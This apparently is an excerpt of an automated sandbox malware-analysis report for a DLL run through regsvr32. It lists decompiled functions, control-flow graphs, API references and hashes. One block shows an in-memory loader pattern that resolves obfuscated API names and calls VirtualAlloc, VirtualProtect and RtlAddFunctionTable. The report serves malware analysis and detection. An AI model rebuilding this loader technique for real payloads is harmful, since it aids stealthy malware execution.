                                                                                                        • Instruction Fuzzy Hash: 10A35E1250DBC5C9E332C23CA4587CFAE8193A3319F484299D3E41AADBC7AE8155DF67
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 53 9f0000-9f029a call 9f091c * 2 66 9f0905 53->66 67 9f02a0-9f02a4 53->67 69 9f0907-9f091a 66->69 67->66 68 9f02aa-9f02ae 67->68 68->66 70 9f02b4-9f02b8 68->70 70->66 71 9f02be-9f02c5 70->71 71->66 72 9f02cb-9f02dc 71->72 72->66 73 9f02e2-9f02eb 72->73 73->66 74 9f02f1-9f02fc 73->74 74->66 75 9f0302-9f0312 74->75 76 9f033f-9f0371 GetNativeSystemInfo 75->76 77 9f0314-9f031a 75->77 76->66 79 9f0377-9f0393 VirtualAlloc 76->79 78 9f031c-9f0324 77->78 80 9f032c-9f032d 78->80 81 9f0326-9f032a 78->81 82 9f03aa-9f03ae 79->82 83 9f0395-9f03a8 79->83 84 9f032f-9f033d 80->84 81->84 85 9f03dc-9f03e3 82->85 86 9f03b0-9f03c2 82->86 83->82 84->76 84->78 87 9f03fb-9f0417 85->87 88 9f03e5-9f03f9 85->88 90 9f03d4-9f03d8 86->90 91 9f0419-9f041a 87->91 92 9f0458-9f0465 87->92 88->87 88->88 93 9f03da 90->93 94 9f03c4-9f03d1 90->94 95 9f041c-9f0422 91->95 96 9f046b-9f0472 92->96 97 9f0537-9f0542 92->97 93->87 94->90 98 9f0448-9f0456 95->98 99 9f0424-9f0446 95->99 96->97 102 9f0478-9f0485 96->102 100 9f0548-9f0559 97->100 101 9f06e6-9f06ed 97->101 98->92 98->95 99->98 99->99 103 9f0562-9f0565 100->103 105 9f07ac-9f07c3 101->105 106 9f06f3-9f0707 101->106 102->97 104 9f048b-9f048f 102->104 107 9f055b-9f055f 103->107 108 9f0567-9f0574 103->108 109 9f051b-9f0525 104->109 112 9f087a-9f088d 105->112 113 9f07c9-9f07cd 105->113 110 9f070d 106->110 111 9f07a9-9f07aa 106->111 107->103 116 9f060d-9f0619 108->116 117 9f057a-9f057d 108->117 114 9f052b-9f0531 109->114 115 9f0494-9f04a8 109->115 118 9f0712-9f0736 110->118 111->105 137 9f088f-9f089a 112->137 138 9f08b3-9f08ba 112->138 119 9f07d0-9f07d3 113->119 114->97 114->104 122 9f04cf-9f04d3 115->122 123 9f04aa-9f04cd 115->123 120 9f061f 116->120 121 9f06e2-9f06e3 116->121 117->116 124 9f0583-9f059b 117->124 149 9f0738-9f073e 118->149 150 9f0796-9f079f 118->150 126 9f085f-9f086d 119->126 127 9f07d9-9f07e9 119->127 130 9f0625-9f0648 120->130 121->101 133 9f04d5-9f04e1 122->133 134 9f04e3-9f04e7 122->134 132 9f0518-9f0519 123->132 124->116 135 9f059d-9f059e 124->135 126->119 131 9f0873-9f0874 126->131 128 9f080d-9f080f 127->128 129 9f07eb-9f07ed 127->129 141 9f0822-9f082b 128->141 142 9f0811-9f0820 128->142 139 9f07ef-9f07f9 129->139 140 9f07fb-9f080b 129->140 164 9f064a-9f064b 130->164 165 9f06b2-9f06b7 130->165 131->112 132->109 145 9f0511-9f0515 133->145 147 9f04fe-9f0502 134->147 148 9f04e9-9f04fc 134->148 146 9f05a0-9f0605 135->146 151 9f08ab-9f08b1 137->151 143 9f08bc-9f08c4 138->143 144 9f08eb-9f0903 138->144 159 9f082e-9f083d 139->159 140->159 141->159 142->159 143->144 156 9f08c6-9f08e9 RtlAddFunctionTable 143->156 144->69 145->132 146->146 160 9f0607 146->160 147->132 158 9f0504-9f050e 147->158 148->145 152 9f0748-9f0754 149->152 153 9f0740-9f0746 149->153 150->118 157 9f07a5-9f07a6 150->157 151->138 154 9f089c-9f08a8 151->154 162 9f0756-9f0757 152->162 163 9f0764-9f0776 152->163 161 9f077b-9f078d 153->161 154->151 156->144 157->111 158->145 166 9f083f-9f0845 159->166 167 9f084b-9f085c VirtualProtect 159->167 160->116 161->150 179 9f078f-9f0794 161->179 170 9f0759-9f0762 162->170 163->161 171 9f064e-9f0651 164->171 172 9f06ce-9f06d8 165->172 173 9f06b9-9f06bd 165->173 166->167 167->126 170->163 170->170 176 9f065b-9f0666 171->176 177 9f0653-9f0659 171->177 172->130 178 9f06de-9f06df 172->178 173->172 174 9f06bf-9f06c3 173->174 174->172 183 9f06c5 174->183 181 9f0668-9f0669 176->181 182 9f0676-9f0688 176->182 180 9f068d-9f06a3 177->180 178->121 179->149 186 9f06ac 180->186 187 9f06a5-9f06aa 180->187 184 9f066b-9f0674 181->184 182->180 183->172 184->182 184->184 186->165 187->171
                                                                                                        APIs
                                                                                                        • GetNativeSystemInfo.KERNELBASE ref: 009F0344
                                                                                                        • VirtualAlloc.KERNELBASE ref: 009F038A
                                                                                                        • VirtualProtect.KERNELBASE ref: 009F085C
                                                                                                        • RtlAddFunctionTable.KERNEL32 ref: 009F08E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.275225461.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_9f0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                        • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                        • API String ID: 998211078-3605381585
                                                                                                        • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction ID: 186dc6acd7c5487e37e44d0bb520ac8ff3e66831e73958e6cfbf1dada1ce9edd
                                                                                                        • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction Fuzzy Hash: 31520530618B4C8BCB19DF18D8857BAB7E5FB94304F14462DE98BC7252EB34E546CB86
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 311 7ffc123d4194-7ffc123d419a 312 7ffc123d41d5-7ffc123d432c 311->312 313 7ffc123d419c-7ffc123d419f 311->313 317 7ffc123d4332-7ffc123d434d call 7ffc123d3da8 312->317 318 7ffc123d432e-7ffc123d4330 312->318 315 7ffc123d41c9-7ffc123d4208 call 7ffc123d3f18 313->315 316 7ffc123d41a1-7ffc123d41a4 313->316 334 7ffc123d420a-7ffc123d420c 315->334 335 7ffc123d4211-7ffc123d4226 call 7ffc123d3da8 315->335 320 7ffc123d41a6-7ffc123d41a9 316->320 321 7ffc123d41bc __scrt_dllmain_crt_thread_attach 316->321 332 7ffc123d4359-7ffc123d4380 call 7ffc123d3ed4 call 7ffc123d3f04 call 7ffc123d40cc call 7ffc123d40f0 317->332 333 7ffc123d434f-7ffc123d4354 call 7ffc123d4944 317->333 323 7ffc123d4382-7ffc123d4391 318->323 326 7ffc123d41ab-7ffc123d41b4 320->326 327 7ffc123d41b5-7ffc123d41ba call 7ffc123d3e58 320->327 322 7ffc123d41c1-7ffc123d41c8 321->322 327->322 332->323 333->332 338 7ffc123d42f9-7ffc123d430e 334->338 343 7ffc123d4228-7ffc123d422d call 7ffc123d4944 335->343 344 7ffc123d4232-7ffc123d4243 call 7ffc123d3e18 335->344 343->344 351 7ffc123d4245-7ffc123d427a call 7ffc123d4b90 call 7ffc123d416c call 7ffc123d4b40 call 7ffc123d416c call 7ffc123d4b6c call 7ffc123da908 344->351 352 7ffc123d42ac-7ffc123d42b6 call 7ffc123d40cc 344->352 378 7ffc123d427f-7ffc123d4281 351->378 352->334 360 7ffc123d42bc-7ffc123d42c8 call 7ffc123d4b88 352->360 366 7ffc123d42ca-7ffc123d42d4 call 7ffc123d4030 360->366 367 7ffc123d42ee-7ffc123d42f4 360->367 366->367 373 7ffc123d42d6-7ffc123d42e9 call 7ffc123d4a8c 366->373 367->338 373->367 378->352 379 7ffc123d4283-7ffc123d428a __scrt_dllmain_after_initialize_c 378->379 379->352 380 7ffc123d428c-7ffc123d42a9 call 7ffc123da8c4 379->380 380->352
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC123D4194(void* __edx) {
                                                                                                        				void* _t5;
                                                                                                        
                                                                                                        				_t5 = __edx;
                                                                                                        				if (_t5 == 0) goto 0x123d41d5;
                                                                                                        				if (_t5 == 0) goto 0x123d41c9;
                                                                                                        				if (_t5 == 0) goto 0x123d41bc;
                                                                                                        				if (__edx == 1) goto 0x123d41b5;
                                                                                                        				return 1;
                                                                                                        			}




                                                                                                        0x7ffc123d4198
                                                                                                        0x7ffc123d419a
                                                                                                        0x7ffc123d419f
                                                                                                        0x7ffc123d41a4
                                                                                                        0x7ffc123d41a9
                                                                                                        0x7ffc123d41b4

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3885183344-0
                                                                                                        • Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                        • Instruction ID: 30ca035e5cc642c4374c6ff1972aeed288d943b1cd2df860b74392abf8181133
                                                                                                        • Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                        • Instruction Fuzzy Hash: F151802DE1CE6F86F610A761A4012F95298EFD5360FC440B5EA4D47697CEACE875CB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC123D1580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
                                                                                                        				char _v16;
                                                                                                        				char _v24;
                                                                                                        				long long _v32;
                                                                                                        				void* _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				void* _t41;
                                                                                                        				intOrPtr* _t49;
                                                                                                        				void* _t77;
                                                                                                        
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v32 = 0xfffffffe;
                                                                                                        				_t49 = _a16;
                                                                                                        				if (_a8 == _t49) goto 0x123d1693;
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC123D1910(1, _t49, _a8, _t77); // executed
                                                                                                        				if (0 == 1) goto 0x123d160a;
                                                                                                        				E00007FFC7FFC123D1850(_a16);
                                                                                                        				_v56 = _t49;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				if ((E00007FFC7FFC123D2A50(_t49, _v56) & 0x000000ff) == 0) goto 0x123d160a;
                                                                                                        				E00007FFC7FFC123D1850(_a16);
                                                                                                        				E00007FFC7FFC123D1870(_t49, _a8, _t49);
                                                                                                        				E00007FFC7FFC123D1850(_a16);
                                                                                                        				_v48 = _t49;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				if ((E00007FFC7FFC123D2A50(_t49, _v48) & 0x000000ff) == 0) goto 0x123d167a;
                                                                                                        				E00007FFC7FFC123D1A20(_t49, _a16,  &_v24);
                                                                                                        				_v40 = _t49;
                                                                                                        				E00007FFC7FFC123D1AA0(_t49, _a16,  &_v16);
                                                                                                        				_t41 = E00007FFC7FFC123D2A90(E00007FFC7FFC123D2A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
                                                                                                        				goto 0x123d1693;
                                                                                                        				E00007FFC7FFC123D2B00(_t41, _a16);
                                                                                                        				return E00007FFC7FFC123D1F00(_t49, _a8, _t49);
                                                                                                        			}












                                                                                                        0x7ffc123d1580
                                                                                                        0x7ffc123d1585
                                                                                                        0x7ffc123d158e
                                                                                                        0x7ffc123d1597
                                                                                                        0x7ffc123d15a1
                                                                                                        0x7ffc123d15a7
                                                                                                        0x7ffc123d15b1
                                                                                                        0x7ffc123d15bc
                                                                                                        0x7ffc123d15c3
                                                                                                        0x7ffc123d15c9
                                                                                                        0x7ffc123d15d3
                                                                                                        0x7ffc123d15ef
                                                                                                        0x7ffc123d15f6
                                                                                                        0x7ffc123d1604
                                                                                                        0x7ffc123d160f
                                                                                                        0x7ffc123d1615
                                                                                                        0x7ffc123d161f
                                                                                                        0x7ffc123d163b
                                                                                                        0x7ffc123d1647
                                                                                                        0x7ffc123d164d
                                                                                                        0x7ffc123d165c
                                                                                                        0x7ffc123d1672
                                                                                                        0x7ffc123d1678
                                                                                                        0x7ffc123d167f
                                                                                                        0x7ffc123d169c

                                                                                                        APIs
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D15C3
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D15D3
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D15F6
                                                                                                          • Part of subcall function 00007FFC123D1870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D1883
                                                                                                        • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFC123D15E4
                                                                                                          • Part of subcall function 00007FFC123D2A50: type_info::_name_internal_method.LIBCMTD ref: 00007FFC123D2A68
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D160F
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D161F
                                                                                                        • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFC123D1630
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 1937815552-0
                                                                                                        • Opcode ID: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
                                                                                                        • Instruction ID: 64cb5b57040aea9de60de9613436ceb1ef6ea229a8b7e63cf477a0f7945d374a
                                                                                                        • Opcode Fuzzy Hash: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
                                                                                                        • Instruction Fuzzy Hash: 6D310E3E65DE5D42DA10EB22E4514AAA365EBC57E0FC01575F9CD837AACE6CE420CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC123D2600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _v80;
                                                                                                        				long long _v88;
                                                                                                        				long long _v96;
                                                                                                        				long long _v104;
                                                                                                        				char _v112;
                                                                                                        				signed long long _v120;
                                                                                                        				void* _t82;
                                                                                                        				signed long long _t111;
                                                                                                        				intOrPtr* _t113;
                                                                                                        				intOrPtr* _t114;
                                                                                                        				long long _t115;
                                                                                                        				intOrPtr* _t116;
                                                                                                        				intOrPtr* _t117;
                                                                                                        				signed long long _t118;
                                                                                                        				long long _t120;
                                                                                                        				long long* _t121;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v24 = 0xfffffffe;
                                                                                                        				_t111 = _a16 | 0x0000000f;
                                                                                                        				_v120 = _t111;
                                                                                                        				E00007FFC7FFC123D2830(_t111, _a8);
                                                                                                        				if (_t111 - _v120 >= 0) goto 0x123d2659;
                                                                                                        				_v120 = _a16;
                                                                                                        				goto 0x123d2736;
                                                                                                        				_t113 = _v120;
                                                                                                        				_v104 = _t113;
                                                                                                        				E00007FFC7FFC123D2150(_t113, _a8);
                                                                                                        				_t114 =  *_t113;
                                                                                                        				if (_t114 - _v104 > 0) goto 0x123d2696;
                                                                                                        				goto 0x123d2736;
                                                                                                        				E00007FFC7FFC123D2150(_t114, _a8);
                                                                                                        				_t115 =  *_t114;
                                                                                                        				_v96 = _t115;
                                                                                                        				E00007FFC7FFC123D2830(_t115, _a8);
                                                                                                        				_t116 = _t115 - _v96;
                                                                                                        				_v88 = _t116;
                                                                                                        				E00007FFC7FFC123D2150(_t116, _a8);
                                                                                                        				if ( *_t116 - _v88 > 0) goto 0x123d2724;
                                                                                                        				E00007FFC7FFC123D2150(_t116, _a8);
                                                                                                        				_t117 =  *_t116;
                                                                                                        				_v80 = _t117;
                                                                                                        				E00007FFC7FFC123D2150(_t117, _a8);
                                                                                                        				_t118 = _v80 +  *_t117;
                                                                                                        				_v120 = _t118;
                                                                                                        				goto 0x123d2736;
                                                                                                        				E00007FFC7FFC123D2830(_t118, _a8);
                                                                                                        				_v120 = _t118;
                                                                                                        				_t120 = _v120 + 1;
                                                                                                        				_v72 = _t120;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				E00007FFC7FFC123D28E0(_t120, _v72); // executed
                                                                                                        				_v64 = _t120;
                                                                                                        				_t121 = _v64;
                                                                                                        				_v112 = _t121;
                                                                                                        				goto 0x123d2771;
                                                                                                        				if (_a24 <= 0) goto 0x123d27b0;
                                                                                                        				_t82 = E00007FFC7FFC123D18F0(_t121, _a8);
                                                                                                        				_v40 = _t121;
                                                                                                        				E00007FFC7FFC123D2C00(_t82, _v112);
                                                                                                        				E00007FFC7FFC123D11E0(_t121, _v40, _a24);
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC123D1910(1, _t121, _a8, _a24);
                                                                                                        				E00007FFC7FFC123D2BC0(E00007FFC7FFC123D2190(_a8), _t121);
                                                                                                        				_v32 = _t121;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				E00007FFC7FFC123D2C10(_t121, _t121, _v32,  &_v112);
                                                                                                        				E00007FFC7FFC123D2150(_t121, _a8);
                                                                                                        				 *_t121 = _v120;
                                                                                                        				return E00007FFC7FFC123D23A0(_t121, _a8, _a24);
                                                                                                        			}
























                                                                                                        0x7ffc123d2600
                                                                                                        0x7ffc123d2605
                                                                                                        0x7ffc123d260a
                                                                                                        0x7ffc123d2616
                                                                                                        0x7ffc123d262a
                                                                                                        0x7ffc123d262e
                                                                                                        0x7ffc123d263b
                                                                                                        0x7ffc123d2645
                                                                                                        0x7ffc123d264f
                                                                                                        0x7ffc123d2654
                                                                                                        0x7ffc123d265b
                                                                                                        0x7ffc123d2668
                                                                                                        0x7ffc123d2675
                                                                                                        0x7ffc123d267c
                                                                                                        0x7ffc123d268f
                                                                                                        0x7ffc123d2691
                                                                                                        0x7ffc123d269e
                                                                                                        0x7ffc123d26a5
                                                                                                        0x7ffc123d26b0
                                                                                                        0x7ffc123d26bd
                                                                                                        0x7ffc123d26c7
                                                                                                        0x7ffc123d26ca
                                                                                                        0x7ffc123d26d7
                                                                                                        0x7ffc123d26e4
                                                                                                        0x7ffc123d26ee
                                                                                                        0x7ffc123d26f5
                                                                                                        0x7ffc123d2700
                                                                                                        0x7ffc123d270d
                                                                                                        0x7ffc123d271a
                                                                                                        0x7ffc123d271d
                                                                                                        0x7ffc123d2722
                                                                                                        0x7ffc123d272c
                                                                                                        0x7ffc123d2731
                                                                                                        0x7ffc123d273b
                                                                                                        0x7ffc123d273e
                                                                                                        0x7ffc123d274b
                                                                                                        0x7ffc123d275b
                                                                                                        0x7ffc123d2760
                                                                                                        0x7ffc123d2765
                                                                                                        0x7ffc123d276a
                                                                                                        0x7ffc123d276f
                                                                                                        0x7ffc123d277a
                                                                                                        0x7ffc123d2784
                                                                                                        0x7ffc123d2789
                                                                                                        0x7ffc123d2793
                                                                                                        0x7ffc123d27ab
                                                                                                        0x7ffc123d27b0
                                                                                                        0x7ffc123d27bd
                                                                                                        0x7ffc123d27d2
                                                                                                        0x7ffc123d27d7
                                                                                                        0x7ffc123d27e4
                                                                                                        0x7ffc123d27f9
                                                                                                        0x7ffc123d2806
                                                                                                        0x7ffc123d2810
                                                                                                        0x7ffc123d282f

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D2830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D283E
                                                                                                          • Part of subcall function 00007FFC123D2830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFC123D284B
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D274B
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC123D275B
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D2784
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D27AB
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D27E4
                                                                                                        • construct.LIBCPMTD ref: 00007FFC123D27F9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 3284725307-0
                                                                                                        • Opcode ID: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
                                                                                                        • Instruction ID: f2e0b3edca5ea8e3f06b5d061e05a48e41f65a10542be980529cac1652ccb534
                                                                                                        • Opcode Fuzzy Hash: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
                                                                                                        • Instruction Fuzzy Hash: 07511D2AA1DF9D85DA70DB51E4513AAA364FBC97A0FC04175EACE83B5ACE7CD410CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC123D1910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _t32;
                                                                                                        				intOrPtr* _t47;
                                                                                                        				long long* _t49;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((_a16 & 0x000000ff) != 0) goto 0x123d1930;
                                                                                                        				goto 0x123d19f1;
                                                                                                        				E00007FFC7FFC123D2150(__rax, _a8);
                                                                                                        				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0x123d19f1;
                                                                                                        				E00007FFC7FFC123D2190(_a8);
                                                                                                        				_t47 =  *((intOrPtr*)(__rax));
                                                                                                        				_v40 = _t47;
                                                                                                        				E00007FFC7FFC123D2BC0(E00007FFC7FFC123D2190(_a8), _t47);
                                                                                                        				_v32 = _t47;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				_t32 = E00007FFC7FFC123D2BD0(_t47, _v32);
                                                                                                        				if (_a24 <= 0) goto 0x123d19bd;
                                                                                                        				E00007FFC7FFC123D2C00(_t32, _v40);
                                                                                                        				_v24 = _t47;
                                                                                                        				E00007FFC7FFC123D2190(_a8);
                                                                                                        				E00007FFC7FFC123D11E0(_t47, _v24, _a24);
                                                                                                        				E00007FFC7FFC123D2150(_t47, _a8);
                                                                                                        				_t49 =  *_t47 + 1;
                                                                                                        				_v16 = _t49;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				E00007FFC7FFC123D2100(_t49, _v40, _v16); // executed
                                                                                                        				E00007FFC7FFC123D2150(_t49, _a8);
                                                                                                        				 *_t49 = 0xf;
                                                                                                        				return E00007FFC7FFC123D23A0(_t49, _a8, _a24);
                                                                                                        			}










                                                                                                        0x7ffc123d1910
                                                                                                        0x7ffc123d1915
                                                                                                        0x7ffc123d1919
                                                                                                        0x7ffc123d1929
                                                                                                        0x7ffc123d192b
                                                                                                        0x7ffc123d1935
                                                                                                        0x7ffc123d193e
                                                                                                        0x7ffc123d1949
                                                                                                        0x7ffc123d194e
                                                                                                        0x7ffc123d1951
                                                                                                        0x7ffc123d1963
                                                                                                        0x7ffc123d1968
                                                                                                        0x7ffc123d1972
                                                                                                        0x7ffc123d1982
                                                                                                        0x7ffc123d198d
                                                                                                        0x7ffc123d1994
                                                                                                        0x7ffc123d1999
                                                                                                        0x7ffc123d19a3
                                                                                                        0x7ffc123d19b8
                                                                                                        0x7ffc123d19c2
                                                                                                        0x7ffc123d19ca
                                                                                                        0x7ffc123d19cd
                                                                                                        0x7ffc123d19d7
                                                                                                        0x7ffc123d19ec
                                                                                                        0x7ffc123d19f6
                                                                                                        0x7ffc123d19fb
                                                                                                        0x7ffc123d1a15

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 2899389904-0
                                                                                                        • Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
